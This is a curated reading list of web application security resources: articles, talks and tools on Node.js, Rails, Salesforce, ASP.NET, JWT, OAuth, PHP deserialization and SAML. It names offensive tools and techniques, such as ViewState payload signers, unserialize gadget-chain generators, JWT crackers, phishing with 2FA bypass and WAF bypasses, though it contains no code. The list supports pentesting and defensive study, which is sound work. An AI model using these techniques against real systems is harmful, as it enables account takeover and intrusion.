- Node.js is widely used for developing both server-side and desktop applications. It provides a cross-platform execution environment for JavaScript programs. Due to the increasing popularity, the security of Node.js is critical to web servers and desktop clients. We present a novel attack method against the Node.js platform, called hidden property abusing (HPA). The new attack leverages the widely-used data exchanging feature of JavaScript to tamper critical program states of Node.js programs, like server-side applications. HPA entitles remote attackers to launch serious attacks, such as stealing confidential data, bypassing security checks, and launching denial of service attacks. To help developers detect the HPA issues of their Node.js applications, we develop a tool, named LYNX, that utilizes hybrid program analysis to automatically reveal HPA vulnerabilities and even synthesize exploits. We apply LYNX on a set of widely-used Node.js programs and identify 13 previously unknown vulnerabilities. LYNX successfully generates 10 severe exploits. We have reported all of our findings to the Node.js community. At the time of paper writing, we have received the confirmation of 12 vulnerabilities and got 12 CVEs assigned. Moreover, we collaborated with an authoritative public vulnerability database to help them use a new vulnerability notion and description in related security issues. The talk consists of four parts. First, we will introduce recent offensive research on Node.js. Second, we will introduce HPA by demonstrating an exploit on a widely-used web framework. Third, we will explain how to leverage program analysis techniques to automatically detect and exploit HPA. In the end, we will have a comprehensive evaluation which discusses how we identified 13 HPA 0days with the help of our detection method.
- phpMyAdmin
- React.JS
- Ruby-on-Rails
- Ruby on Rails Penetration Testing - 3SLabs(2014)
- Going AUTH the Rails on a Crazy Train - Tomek Rabczak, Jeff Jarmoc(Derbycon2015)
- Rails has a strong foundation in convention over configuration. In this regard, Rails handles a lot of security related conventions for developers, keeping them safe from vulnerabilities such as SQL Injection, XSS, and CSRF out of the box. However, authentication and authorization logic is largely left up to the developer. It is here that the abilities of the framework hit the end of the track and it's up to the developers to keep themselves safe. In this talk, we take a look at patterns that we've seen across some of the largest Rails applications on the internet and cover common pitfalls that you as a security researcher and/or developer can watch out for. We will also be discussing and releasing a new dynamic analysis tool for Rails applications to help pentesters navigate through authentication and authorization solutions in Rails.
- Vulnerabilities Within Ruby on Rails - Arvind Doraiswamy(2015)
- Attacking Ruby on Rails Applications - joernchen(2016)
- Zen Rails Security Checklist
- This document provides a not necessarily comprehensive list of security measures to be implemented when developing a Ruby on Rails application. It is designed to serve as a quick reference and minimize vulnerabilities caused by developer forgetfulness. It does not replace developer training on secure coding principles and how they can be applied.
- Salesforce
- Articles
- SFDC Secure Development Cheat Sheet - Zach Julian(2019)
- Salesforce Lightning - Tinting the Windows - Aaron Costello(2020)
- Features of the Browser Fingerprint - Salesforce
- Salesforce Lightning - An in-depth look at exploitation vectors for the everyday community - Aaron Costello(2020)
- Lightning Components: A Treatise on Apex Security from an External Perspective - Aaron Costello(2021)
- in simple words: Pen-Testing Salesforce SAAS Application (Part 1 - The Essentials) - Praveen Kanniah(2021)
- Are you oversharing (in Salesforce)? Our new tool could sniff it out! - Jerome Smith(2021)
- How Salesforce Helps Protect You From Session Hijacking Threats - Regunathan Radhakrishnan(2022)
- Hacking Salesforce-backed WebApps - hypn.za.net(2022)
- Understanding Salesforce Flows and Common Security Risks - Aaron Costello(2022)
- Tools
- Raccoon
- Salesforce object auditor
- Salesforce Recon and Exploitation Toolkit
- Spring
- How Spring Web MVC Really Works - Stackify.com
- Spring View Manipulation Vulnerability - Michael Stepankin(2020)
- In this article, we explain how dangerous an unrestricted view name manipulation in Spring Framework could be.
- Springboot
- Articles/Blogposts
- Tools
- Symfony
- Vue.js
- Wordpress
- ASP.NET
- 101
- Articles/Blogposts/Writeups
- Getting Shell with XAMLX Files - Soroush Dalili
- ASP.NET resource files (.RESX) and deserialisation issues - Soroush Dalili(2018)
- Uploading web.config for Fun and Profit 2 - Soroush Dalili(2019)
- Technical Advisory: Bypassing Microsoft XOML Workflows Protection Mechanisms using Deserialisation of Untrusted Data - Soroush Dalili
- XAML overview in WPF - docs.ms
- Rare ASP.NET request validation bypass using request encoding - nccgroup(2017)
- Covert Web Shells in .NET with Read-Only Web Paths - Soroush Dalili(2020)
- Presentations/Talks/Videos
- Tools
- viewstate
- A small Python 3.5+ library for decoding ASP.NET viewstate.
- viewgen
- viewgen is a ViewState tool capable of generating both signed and encrypted payloads with leaked validation keys
- RCEvil.NET
- RCEvil.NET is a tool for signing malicious ViewStates with a known validationKey. Any (even empty) ASPX page is a valid target. See http://illuminopi.com/ for full details on the attack vector.
- General
- Unexpected Execution: Wild Ways Code Execution can Occur in Python - Graham Bleaney(PyConUS2021)
- Code
- Every Python user knows that you can execute code using eval or exec, but what about yaml or str.format? This talk will take you on a walk through all the weird and wild ways that you can achieve code execution on a Python server (and trust me, I didn’t spoil the surprise by putting the weirdest ones in the description). The talk should be equal parts practical and entertaining as we work through both real examples of code execution vulnerabilities found in running code as well as absurd remote code execution exploits. The talk will end on a practical note by explaining how Facebook detects and prevents the exploit vectors we discussed, using an open source Python Static Analyzer called Pysa.
- Flask
- Articles/Blogposts/Writeups
- Injecting Flask - Ryan Reid
- In this adventure we will discuss some of the security features available and potential issues within the Flask micro-framework with respect to Server-Side Template Injection, Cross-Site Scripting, and HTML attribute injection attacks, a subset of XSS. If you’ve never had the pleasure of working with Flask, you’re in for a treat. Flask is a lightweight python framework that provides a simple yet powerful and extensible structure (it is Python after all).
- 101
- json.org
- "JSON (JavaScript Object Notation) is a lightweight data-interchange format. It is easy for humans to read and write. It is easy for machines to parse and generate. It is based on a subset of the JavaScript Programming Language Standard ECMA-262 3rd Edition - December 1999. JSON is a text format that is completely language independent but uses conventions that are familiar to programmers of the C-family of languages, including C, C++, C#, Java, JavaScript, Perl, Python, and many others. These properties make JSON an ideal data-interchange language."
- JSON Schema
- JSON Schema is a declarative language that allows you to annotate and validate JSON documents.
- Articles/Blogposts/Writeups
- Best Practices to Mitigate JSON Interoperability Vulnerabilities - Claudio Salazar(2021)
- An Exploration of JSON Interoperability Vulnerabilities - Jake Miller(2021)
- "TL;DR The same JSON document can be parsed with different values across microservices, leading to a variety of potential security risks."
- Tools
- JSON Interoperability Vulnerability Labs
- Companion labs to "An Exploration of JSON Interoperability Vulnerabilities"
- 101
- JSON Web Token - Wikipedia
- RFC 7519: JSON Web Token (JWT)
- RFC 8725: JSON Web Token Best Current Practices
- JSON Web Tokens, also known as JWTs, are URL-safe JSON-based security tokens that contain a set of claims that can be signed and/or encrypted. JWTs are being widely used and deployed as a simple security token format in numerous protocols and applications, both in the area of digital identity and in other application areas. This Best Current Practices document updates RFC 7519 to provide actionable guidance leading to secure implementation and deployment of JWTs.
- The Anatomy of a JSON Web Token
- Introduction to JSON Web Tokens
- JSON Web Token Flowchart
- JSON Web Token Security Cheat Sheet
- Learn JSON Web Token(JWT) in 10 Minutes - tutorialdocs.com
- Informational
- Articles/Blogposts/Writeups
- JWT Handbook - Auth0
- Reference Tokens and Introspection - leastprivilege.com(2015)
- Stop using JWT for sessions - joepie91(2016)
- Stop using JWT for sessions, part 2: Why your solution doesn't work - joepie91(2016)
- JSON Web Token Best Current Practices - draft-ietf-oauth-jwt-bcp-07
- JWTs: Which Signing Algorithm Should I Use? - Scott Brady(2020)
- The Hard Parts of JWT Security Nobody Talks About - Philippe De Ryck(2019)
- Building a Secure Signed JWT - Dan Moore(2020)
- Presentations/Talks/Videos
- Jwt==insecurity? - Ruxcon2018
- JSON Web Tokens Suck - Randall Degges (DevNet Create 2018)
- JSON Web Tokens (JWTs) are all the rage in the security world. They're becoming more and more ubiquitous in web authentication libraries, and are commonly used to store a user's identity information. In this talk, you'll learn why JWTs suck, and why you should never use them.
- Attacking and Securing JWT - @airman604(OWASP Vancouver)
- JWTs in a Flash! - Evan Johnson(Defcon24)
- The new(ish) JOSE standard is growing rapidly in popularity. Many people are excited to adopt the new standard and use it to build interesting and new things with JWT! Let's get everyone up to speed on JWTs, talk about the do's and don'ts regarding JWTs, review some JWT uses, and use JWTs effectively.
- Are You Properly Using JWTs? - Dmitry Sotnikov(AppSec California2020)
- JSON Web Tokens (JWTs) are used massively in API-based applications as access tokens or to transport information across services. Unfortunately, JWTs are often misused and incorrectly handled. Massive data breaches have occurred in the last 18 months due to token leakage and lack of proper validation. This session focuses on best practices and real world examples of JWT usage, where we cover: typical scenarios where using JWT is a good idea; typical scenarios where using JWT is a bad idea; principles of Zero Trust architecture and why you should always validate; best practices to thoroughly validate JWTs and potential vulnerabilities if you don't; use cases when encryption may be required for JWT.
- JWT Parkour - Louis Nyffenegger(AppSec California2020)
- Nowadays, JSON Web Tokens are everywhere. They are used as session tokens or just to pass data between applications or µservices. By design, JWT contains a high number of security and cryptography pitfalls. In this talk, we are going to learn how to exploit (with demos) some of those issues. After covering the basics (None and Algorithm confusion), we are going to move to kid injection, embedded JWK (CVE-2018-0114). Finally, we will look at jku and x5u attributes and how they can be abused by chaining vulnerabilities.
- JWT: jku x5u - Louis Nyffenegger(2020)
- Talk on JWT jku and x5u and how to attack them
- Articles/Blogposts/Writeups
- Attacking
- 101
- JWT Attack Playbook
- This wiki is a project to document the known attacks and potential security vulnerabilities and misconfigurations you may come across when testing JSON Web Tokens, and to provide a repeatable methodology for attacking them.
- JWT Hacking 101 - trustfoundry.net
- Articles/Blogposts/Writeups
- JWT Tool Attack Methods - ticarpi
- JWT Vulnerabilities (Json Web Tokens) - HackTricks
- JWT Attack Walk-Through - Jerome Smith(2019)
- Hacking JWT Tokens: The None Algorithm - Shivam Bathla
- How to Hack a Weak JWT Implementation with a Timing Attack - Tamas Polgar(2017)
- Practicing JWT Attacks Against Juice-Shop - scomurr(2020)
- Hardcoded secrets, unverified tokens, and other common JWT mistakes - Vasilii Ermilov(2020)
- Talks/Presentations
- Friday the 13th: JSON Attacks - Defcon25
- Critical vulnerabilities in JSON Web Token libraries - 2015
- Cracking JWT tokens: a tale of magic, Node.JS and parallel computing - Luciano Mammino(Codemotion Milan2017)
- Learn how you can use some JavaScript/Node.js black magic to crack JWT tokens and impersonate other users or escalate privileges. Just add a pinch of ZeroMQ, a dose of parallel computing, a 4 leaf clover, mix everything applying some brute force and you'll get a powerful JWT cracking potion!
- The Hacker's Guide to JWT Security by Patrycja Wegrzynowicz(2019)
- JSON Web Token (JWT) is an open standard for creating tokens that assert some number of claims like a logged in user and his/her roles. JWT is widely used in modern applications as a stateless authentication mechanism. Therefore, it is important to understand JWT security risks, especially when broken authentication is among the most prominent security vulnerabilities according to the OWASP Top 10 list. This talk guides you through various security risks of JWT, including confidentiality problems, vulnerabilities in algorithms and libraries, token cracking, token sidejacking, and more. In live demos, you’ll learn how to hijack a user account exploiting common security vulnerabilities on the client-side, on the server-side, and in transport. You’ll also find out about common mistakes and vulnerabilities along with the best practices related to the implementation of JWT authentication and the usage of available JWT libraries.
- "JWAT.... Attacking JSON Web Tokens" - Louis Nyffenegger(BSides Canberra 2019)
- Modern Webapp Pentesting: How to Attack a JWT - BB King(2020)
- In this Black Hills Information Security webcast - an excerpt from his upcoming 16-hour Modern Webapp Pentesting course - BB King will talk about what JSON Web Tokens are, why they're so controversial, and how to test for their major weaknesses. Then, using OWASP's Juice Shop as a target, he'll show you a straightforward method for exploiting them that you can use on your own next webapp pentest.
- 101
- Testing
- Tools
- json token decode
- JWT Inspector - FF plugin
- JWT Inspector is a browser extension that lets you decode and inspect JSON Web Tokens in requests, cookies, and local storage. Also debug any JWT directly from the console or in the built-in UI.
- c-jwt-cracker
- JWT4B
- JSON Web Tokens (JWT) support for the Burp Interception Proxy. JWT4B will let you manipulate a JWT on the fly, automate common attacks against JWT and decode it for you in the proxy history. JWT4B automagically detects JWTs in the form of 'Authorization Bearer' headers as well as customizable post body parameters.
- jwt_tool
- a toolkit for validating, forging and cracking JWTs (JSON Web Tokens).
- Introducing JWT Tool - ticarpi
- jwt_secrets - BBhacKing
- A list of "secrets" from JWT sample code and readme files based on the list of projects at https://jwt.io/
- jwt-secrets - wallarm
- The goal for this project was to find as many publicly available JWT secrets as possible to help developers and DevOpses identify them by traffic analysis at the Wallarm NGWAF level.
- Writeups
- How to configure Json.NET to create a vulnerable web API - alphabot
- 🔐 Learn how to use JSON Web Token (JWT) to secure your next Web App! (Tutorial/Example with Tests!!)
- Critical vulnerabilities in JSON Web Token libraries
- Brute Forcing HS256 is Possible: The Importance of Using Strong Keys in Signing JWTs
- Hacking JSON Web Token (JWT) - Hate_401
- JWT (JSON Web Token) (in)security - Michal Sajdak(2019)
- Practical Approaches for Testing and Breaking JWT Authentication - Mazin Ahmed
- JSON Web Token Validation Bypass in Auth0 Authentication API - Ben Knight(2020)
- 101
- What is MIME Sniffing? - keycdn.com
- Content Sniffing - Wikipedia
- Content sniffing, also known as media type sniffing or MIME sniffing, is the practice of inspecting the content of a byte stream to attempt to deduce the file format of the data within it.
- MIME Sniffing - whatwg.org
- Media Type Sniffing | draft-ietf-websec-mime-sniff-03
- Many web servers supply incorrect Content-Type header fields with their HTTP responses. In order to be compatible with these servers, user agents consider the content of HTTP responses as well as the Content-Type header fields when determining the effective media type of the response. This document describes an algorithm for determining the effective media type of HTTP responses that balances security and compatibility considerations.
- Articles/Blogposts/Writeups
- Exploitation of
- Tools
- 101
- OAuth 2.0 Security Best Current Practice draft-ietf-oauth-security-topics-05 - Expires Sept19,2018
- This document describes best current security practices for OAuth 2.0. It updates and extends the OAuth 2.0 Security Threat Model to incorporate practical experiences gathered since OAuth 2.0 was published and covers new threats relevant due to the broader application of OAuth 2.0.
- OAuth 2.0 Dynamic Client Registration Protocol - rfc7591
- This specification defines mechanisms for dynamically registering OAuth 2.0 clients with authorization servers. Registration requests send a set of desired client metadata values to the authorization server. The resulting registration responses return a client identifier to use at the authorization server and the client metadata values registered for the client. The client can then use this registration information to communicate with the authorization server using the OAuth 2.0 protocol. This specification also defines a set of common client metadata fields and values for clients to use during registration.
- The OAuth 2.0 Authorization Framework: JWT Secured Authorization Request - ietf.org
- The authorization request in OAuth 2.0 described in RFC 6749 utilizes query parameter serialization, which means that Authorization Request parameters are encoded in the URI of the request and sent through user agents such as web browsers. While it is easy to implement, it means that (a) the communication through the user agents is not integrity protected and thus the parameters can be tainted, and (b) the source of the communication is not authenticated. Because of these weaknesses, several attacks on the protocol have now been put forward. This document introduces the ability to send request parameters in a JSON Web Token (JWT) instead, which allows the request to be signed with JSON Web Signature (JWS) and encrypted with JSON Web Encryption (JWE) so that the integrity, source authentication and confidentiality properties of the Authorization Request are attained. The request can be sent by value or by reference.
- OAuth 2.0 Mutual TLS Client Authentication and Certificate Bound Access Tokens - ietf
- This document describes Transport Layer Security (TLS) mutual authentication using X.509 certificates as a mechanism for OAuth client authentication to the authorization server, as well as for certificate-bound sender-constrained access tokens as a method for a protected resource to ensure that an access token presented to it by a given client was issued to that client by the authorization server.
- RFC 6819: OAuth 2.0 Threat Model and Security Considerations
- OAuth 2.0 Security Best Current Practice draft-ietf-oauth-security-topics-15
- The Modern Guide to OAuth - Brian Pontarelli, Dan Moore(2021)
- Signing in with Google - Okta
- Multi-Factor Authentication: 4 Challenges Faced by Developers - Micah Silverman(2018)
- Articles/Blogposts/Writeups
- Dancing with OAuth: Understanding how Authorization Works - Ashish Mathur
- Shining a Light on OAuth Abuse with PwnAuth - Douglas Bienstock
- OAUTH – Everything you wanted to know but not really! - Elaheh Samani, Kevin Watkins
- An Illustrated Guide to OAuth and OpenID Connect - David Neal(2019)
- Analysis of Common Federated Identity Protocols: OpenID Connect vs OAuth 2.0 vs SAML 2.0 - hackedu.io
- RFC 8693 OAuth 2.0 Token Exchange
- Introduction to OAuth 2.0 and OpenID Connect - PragmaticWebSecurity
- Mastering OAuth 2.0 and OpenID Connect - PragmaticWebSecurity
- OAuth 2.0 : Explained - Milind Daftari(2019)
- What's new in OAuth 2.1? - Dan Moore(2020)
- Common Federated Identity Protocols: OpenID Connect vs OAuth vs SAML 2 - hackedu(2020)
- Google Oauth2 API Explained - Pumudu Ruhunage(2020)
- Hidden OAuth attack vectors - Michael Stepankin(2021)
- OAuth 2.0 authentication vulnerabilities - Portswigger
- Security Analysis in an OpenID Connect Lab Environment - Christian Fries(2021)
- OAuth by Sakurity
- Approaches for authenticating external applications in a machine-to-machine scenario - Patrick Sard and Jeremy Ware(2022)
- Microsoft and GitHub OAuth Implementation Vulnerabilities Lead to Redirection Attacks - David Krispin, Nir Swartz(2021)
- OAuth 2.0 Hacking for Beginners with Farah Hawa - Farah Hawa
- An introduction to some authentication flows in OAuth 2.0 followed by a demo of some common bug types that can be found in them.
- alert(‘OAuth 2.0’); // The impact of XSS on OAuth 2.0 in SPAs - Philippe De Ryck
- OAuth Abuse: Think Solarwinds/Solorigate Campaign with Focus on Cloud Applications - Itir Clarke, Assaf Friedman(2021)
- 2FA Bypass via Google Identity & OAuth Login - Sharat Kaikolamthuruthil(2022)
- Account hijacking using "dirty dancing" in sign-in OAuth-flows - Frans Rosen(2022)
- How can Hackers Analyze the Attacks on OAuth 2.0? - anubhav.singh(2022)
- Presentations/Talks/Videos
- OAuth2: Beyond The Specs - Daniele Timo Second - BSides Lisbon2018
- What if you roll out OAuth, and realize there are a bunch of small things you didn’t consider? It’s what happened to us at Pipedrive, and although it’s likely not over just yet, we’re running smoothly. It’s a good time to share what we’ve learned and save others some time. While building Pipedrive’s marketplace for third-party apps, we transitioned from API token authentication to OAuth, and it’s been an interesting learning experience. In this talk, I will explain how the protocol works, discuss differences in how OAuth is implemented on different platforms, and explain how we managed the transition from API token to OAuth. I will explain how CSRF attacks work in OAuth, how the state parameter can prevent them, how to manage synchronization between server and clients, and what you can run into when you roll out OAuth for dozens of apps.
- OAuth 2.0 and OpenID Connect (in plain English) - Nate Barbettini(OktaDev)
- Discord Hangout: Practical OAuth Attacks - Scot Berner
- During this Discord Hangout, Scot Berner (@slobtresix0) provides some background on OAuth and how attackers can use it to gain access to an organization. Scot shows how Microsoft uses OAuth with Microsoft 365 along with how it can be used for social engineering and external attacks.
- OAuth: When Things Go Wrong - Aaron Parecki(2019)
- Slides
- Aaron Parecki discusses common security threats when building microservices using OAuth and how to protect yourself. You'll learn about high-profile API security breaches related to OAuth; common implementation patterns for mobile apps, browser-based apps, and web server apps; and the latest best practices around OAuth security being developed by the IETF OAuth working group.
- How To Hack OAuth|Øredev 2019 - Aaron Parecki(2019)
- OAuth is the foundation of most of modern online security, used everywhere from signing in to mobile apps, to protecting your bank accounts. Despite its ubiquity, it is still often difficult to implement safely and securely, especially in today's landscape, which is dramatically different from the world of online security as it existed when OAuth was initially created. This talk will explore several real-world OAuth hacks that affected major providers like Twitter, Facebook and Google. I'll share the details of how each specific attack happened, as well as what they could have done to prevent it. Some of these attacks exploited technical flaws in the system, and some exploited the easier to hack, squishier component in the middle: people.
- Implementation Pitfalls Of OAuth 2.0 - Samit Anwer(GreHack2019)
- "Since the beginning of distributed personal computer networks, one of the toughest problems has been to provide a secure SSO and authorization experience between unrelated servers/services. The OAuth 2.0 authorization framework enables 3rd party apps to obtain discretionary access to a web service. Built on top of OAuth, OpenID Connect is a helpful “identity layer” that provides developers with a framework to build an authentication system. In this race of providing OAuth/OpenID Connect based access to assets, authorization service providers have been forced to release half-baked solutions in the wild, because of which relying parties and users face a myriad of issues ranging from authorization code compromise (unauthorized resource access) to account takeovers. In this talk we will discuss common malpractices that "relying party" and "authorization service provider" developers perform when implementing OAuth/OpenID based solutions. We will learn the attacks that can happen thereof and their mitigation."
- Introduction to OAuth 2.0 and OpenID Connect - Philippe De Ryck
- OAuth Bypass Technique - Sheikh Rizan(BSides Singapore2021)
- OAuth is an open standard for access delegation, commonly used as a way for Internet users to grant websites or applications access to their information on other websites without giving them the passwords. We often see websites with a “Sign in with Facebook” option. This facility provides convenience to users that do not wish to sign up using the traditional username and password option. However, there exists a small number of websites that have poorly implemented OAuth, allowing an attacker to bypass the authentication and impersonate another user to gain access to the websites’ protected resources. This technique is known in the Bug Bounty community and is regarded as an authentication bypass or an account take-over. While there are various write-ups with regards to OAuth authentication bypass, this technique is not widely covered. We would like to present the technical details of the vulnerability we had found.
- Hacking Oauth Applications - Pt. 1 - HackingSimplified(2021)
- In this part we discuss OAuth - what, why & how - and then look at some of the flows, like the authorization code grant and the implicit grant. We close today's session with a hands-on Portswigger lab on the implicit grant flow.
- Attacking
- The most common OAuth 2.0 Hacks - Okhomiak
- Bypassing GitHub's OAuth flow - Teddy Katz
- Practical OAuth Abuse for Offensive Operations – Part 1 - Scot Berner(2020)
- An offensive guide to the Authorization Code grant - Rami McCarthy
- Penetration Tester's Guide to Evaluating OAuth 2.0 — Authorization Code Grants
- OAuth 2.0 Implementation and Security - Haboob
- The Wonderful World of OAuth: Bug Bounty Edition - A Bug’z Life(2020)
- Tools
- OAuth 2.0 Playground - Okta
- oauth2-proxy/oauth2-proxy
- A reverse proxy that provides authentication with Google, Azure, OpenID Connect and many more identity providers.
- Articles/Blogposts/Writeups
- Path Building vs Path Verifying: The Chain of Pain - Ryan Sleevi(2020)
- How to exploit parser differentials - Joern Schneeweisz(2020)
- Breaking Parser Logic: Gain Access To NGINX Plus API — Read/Write Upstreams. - zoid(2022)
- Pwning a Server using Markdown: Escalating a bug in a vulnerable markdown parser to exploit LFI and get RCE - Aditya Dixit
- Talks/Presentations/Videos
- Breaking Parser Logic: Take Your Path Normalization off and Pop 0days Out! - Orange Tsai(2020)
- Slides
- "We propose a new exploit technique that brings a whole-new attack surface to defeat path normalization, which is complicated in implementation due to many implicit properties and edge cases. This complication, being under-estimated or ignored by developers for a long time, has made our proposed attack vector possible, lethal, and general. "
- Tools
- Bypass-Url-Parser
- Tool that tests MANY url bypasses to reach a 40X protected page.
- 101
- Articles/Blogposts/Writeups
- 101
- Articles/Blogposts/Writeups
- Pwning PHP mail() function For Fun And RCE | New Exploitation Techniques And Vectors
- The unexpected dangers of preg_replace
- Imagecreatefromgif-Bypass
- A simple helper script to find byte sequences present in both of 2 given files. The main purpose of this is to find bytes that remain untouched after being processed with imagecreatefromgif() PHP function from GD-LIB. That is the place where a malicious PHP script can be inserted to achieve some nasty RCE.
- Is PHP vulnerable and under what conditions?
- PHP7 Internals - Become a Wizard
- Welcome to the PHP Internals Hub - If you ever wondered about how PHP works internally and how you can exploit it: this is where you should start. In this repo, I show basic and advanced exploitation in PHP (some of the bugs reported by me). In every "chapter", you'll learn a little bit more about PHP Internals from an infosec perspective.
- Modern PHP Security Part 1: bug classes - Thomas Chauchefoin, Lena David(2020)
- Modern PHP Security Part 2: Breaching and hardening the PHP engine - Thomas Chauchefoin, Lena David(2020)
- Code Reuse
- 101
- Articles/Blogposts/Writeups
- Crypto
- 101
- Articles/Blogposts/Writeups
- I Forgot Your Password: Randomness Attacks Against PHP Applications - George Argyros, Aggelos Kiayias
- We provide a number of practical techniques and algorithms for exploiting randomness vulnerabilities in PHP applications. We focus on the predictability of password reset tokens and demonstrate how an attacker can take over user accounts in a web application via predicting or algorithmically derandomizing the PHP core randomness generators. While our techniques are designed for the PHP language, the principles behind our techniques and our algorithms are independent of PHP and can readily apply to any system that utilizes weak randomness generators or low entropy sources. Our results include: algorithms that reduce the entropy of time variables, identifying and exploiting vulnerabilities of the PHP system that enable the recovery or reconstruction of PRNG seeds, an experimental analysis of the Hastad-Shamir framework for breaking truncated linear variables, an optimized online Gaussian solver for large sparse linear systems, and an algorithm for recovering the state of the Mersenne twister generator from any level of truncation. We demonstrate the gravity of our attacks via a number of case studies. Specifically, we show that a number of current widely used web applications can be broken using our techniques including Mediawiki, Joomla, Gallery, osCommerce and others.
- De/Serialization
- 101
- Articles/Blogposts/Writeups
- Demystifying Insecure Deserialization in PHP - Sourov Gosh(2020)
- Writing Exploits For Exotic Bug Classes: unserialize()
- Remote code execution via PHP [Unserialize] - notsosecure
- PHP Generic Gadget Chains: Exploiting unserialize in unknown environments
- PHPGGC: PHP Generic Gadget Chains
- PHPGGC is a library of unserialize() payloads along with a tool to generate them, from command line or programmatically. When encountering an unserialize on a website you don't have the code of, or simply when trying to build an exploit, this tool allows you to generate the payload without having to go through the tedious steps of finding gadgets and combining them. Currently, the tool supports: Doctrine, Guzzle, Laravel, Monolog, Slim, SwiftMailer.
- File Operation Induced Unserialization via the "phar://" Stream Wrapper - secarma labs
- PHP Object Injection Cheat Sheet - Lucian Nitescu(2018)
- Testing Methodology for Insecure Deserialization Vulnerability - SecureLayer7(2021)
- Insecure Deserialization - How to Trace Down a Gadget Chain - redteampentesting(2021)
- Remote code execution through unsafe unserialize in PHP - Sjoerd Langkemper(2021)
- Unserializable, but unreachable: Remote code execution on vBulletin - Charles Fol(2023)
- Talks/Presentations/Videos
- Intro to PHP Deserialization / Object Injection - Ippsec(2019)
- Advanced PHP Deserialization - Phar Files - Ippsec(2019)
- Exploiting PHP7 unserialize - Yannay Livneh (33c3)
- PHP 7 is a new version of the most prevalent server-side language in use today. Like previous versions, this version is also vulnerable to memory corruptions. However, the language has gone through extensive changes and none of the previous exploitation techniques are relevant. In this talk, we explore the new memory internals of the language from the exploiter's and vulnerability researcher's point of view. We will explain newly found vulnerabilities in the 'unserialize' mechanism of the language and present re-usable primitives for remote exploitation of these vulnerabilities.
- Pictures
- Hacking with Pictures - Syscan2015
- Exploiting PHP-GD imagecreatefromjpeg() function - fakhrizulkifli
- Proof-of-concept to exploit the flaw in the PHP-GD built-in function, imagecreatefromjpeg(). Inspired by one of Reddit's comment on my previous thread regarding exploiting the imagecreatefromgif() PHP-GD function.
- Property-Oriented Programming(POP)
- Code Reuse Attacks in PHP: Automated POP Chain Generation
- In this paper, we study code reuse attacks in the context of PHP-based web applications. We analyze how PHP object injection (POI) vulnerabilities can be exploited via property-oriented programming (POP) and perform a systematic analysis of available gadgets in common PHP applications. Furthermore, we introduce an automated approach to statically detect POI vulnerabilities in object-oriented PHP code. Our approach is also capable of generating POP chains in an automated way. We implemented a prototype of the proposed approach and evaluated it with 10 well-known applications. Overall, we detected 30 new POI vulnerabilities and 28 new gadget chains.
- Utilizing Code Reuse/ROP in PHP Application Exploits - BH 2010
- POP-Exploit
- Research into Property Oriented Programming about php applications.
- Filters
- PHP filter_var shenanigans - Jordy Zomer(2021)
- "It is likely that we have all seen PHP filters that prevent us from encountering vulnerabilities. Here in this blog post, I’ll walk you through my thought process for bypassing a filter by looking for a bug in the filter itself in order to reach a bug!"
- PHP filters chain: What is it and how to use it - Rémi Matasse(2022)
- "In this article we will explain how to combine a recently discovered technique called PHP filters [LOKNOP-GIST], to transform file inclusion primitives in PHP applications to remote code execution."
- Function Injection
- Bypassing Disabled Functions
- Polyglots
- String Parsing
- Abusing PHP query string parser to bypass IDS, IPS, and WAF - theMiddle(2019)
- In this post, we'll see how the PHP query string parser could lead to many IDS/IPS and Application Firewall rules bypass.
- Type Juggling
- 101
- Articles/Blogposts/Writeups
- (Super) Magic Hashes - myst404
- "TL;DR: Magic hashes are well known specific hashes used to exploit Type Juggling attacks in PHP. Combined with bcrypt limitations, we propose the concept of Super Magic Hashes. These hashes can detect 3 different vulnerabilities: type juggling, weak password storage and incorrect Bcrypt usage. A Go PoC found some MD5, SHA1 and SHA224 super magic hashes."
- Writing Exploits For Exotic Bug Classes: PHP Type Juggling
- From hacked client to 0day discovery - infoteam
- PHP equivalency check failure writeup
- Writeups
- Php Codz Hacking
- Writeups of specific PHP vulns
- Privilege Escalation in 2.3M WooCommerce Shops - Karim El Ouerghemmi, Slavco Mihajloski
- During our research we discovered a PHP Object Injection vulnerability in WooCommerce (CVE-2017-18356) that allows escalating privileges with a unique and interesting injection technique.
- Tools
- 101
- Protocol Buffers - Google
- "Protocol buffers are Google's language-neutral, platform-neutral, extensible mechanism for serializing structured data – think XML, but smaller, faster, and simpler. You define how you want your data to be structured once, then you can use special generated source code to easily write and read your structured data to and from a variety of data streams and using a variety of languages."
- gRPC
- 101
- General
- Tools
- grpcurl
- Like cURL, but for gRPC: Command-line tool for interacting with gRPC servers
- 101
- Articles/Blogposts/Writeups
- Executing commands in ruby
- Attacking Ruby on Rails Applications - phrack
- Going AUTH the Rails on a Crazy Train: A Dive into Rails Authentication and Authorization
- Property Oriented Programming - Applied to Ruby
- Pentesting Django and Rails
- Execution of shell code in Ruby scripts
- Pre-Auth RCE in Aspera Faspex: Case Guide for Auditing Ruby on Rails - Maxwell Garrett, Shubham Shah
- Tools
- Brakeman
- Brakeman is an open source static analysis tool which checks Ruby on Rails applications for security vulnerabilities.
- 101
- RFC 6454: The Web Origin Concept
- This document defines the concept of an "origin", which is often used as the scope of authority or privilege by user agents. Typically, user agents isolate content retrieved from different origins to prevent malicious web site operators from interfering with the operation of benign web sites. In addition to outlining the principles that underlie the concept of origin, this document details how to determine the origin of a URI and how to serialize an origin into a string. It also defines an HTTP header field, named "Origin", that indicates which origins are associated with an HTTP request.
- Same-origin policy - Mozilla
- The same-origin policy is a critical security mechanism that restricts how a document or script loaded from one origin can interact with a resource from another origin. It helps isolate potentially malicious documents, reducing possible attack vectors.
- Same-origin policy - Wikipedia
- Same-origin Policy - W3
- Articles/Blogposts/Writeups
- Whitepaper: The Definitive Guide to Same-origin Policy - Alex Baker, Ziyahan Albeniz, Emre Iyidogan
- Same-Origin Policy: From birth until today - Alex Nikolova
- [My hacking adventures with Safari reader mode - Nikhil Mittal(2020)](https://payatu.com/blog/my-hacking-adventures-with-safari-reader-mode/)
- WebSockets not Bound by SOP and CORS? Does this mean… - Drew Branch(2018)
- The Same-Origin Policy Gone Wild - Parsia(2020)
- Talks/Presentations
- 101
- Articles/Blogposts/Writeups
- With Great Power Comes Great Pwnage
- Out of Band XML External Entity Injection via SAML SSO - Sean Melia
- Web-based Single Sign-On and the Dangers of SAML XML Parsing
- Following the white Rabbit Down the SAML Code
- Evilginx - Advanced Phishing with Two-factor Authentication Bypass
- SAML All the Things! A Deep Dive into SAML SSO - Elijah A. Martin-Merrill
- Golden SAML Attack
- Golden SAML: Newly Discovered Attack Technique Forges Authentication to Cloud Apps
- shimit
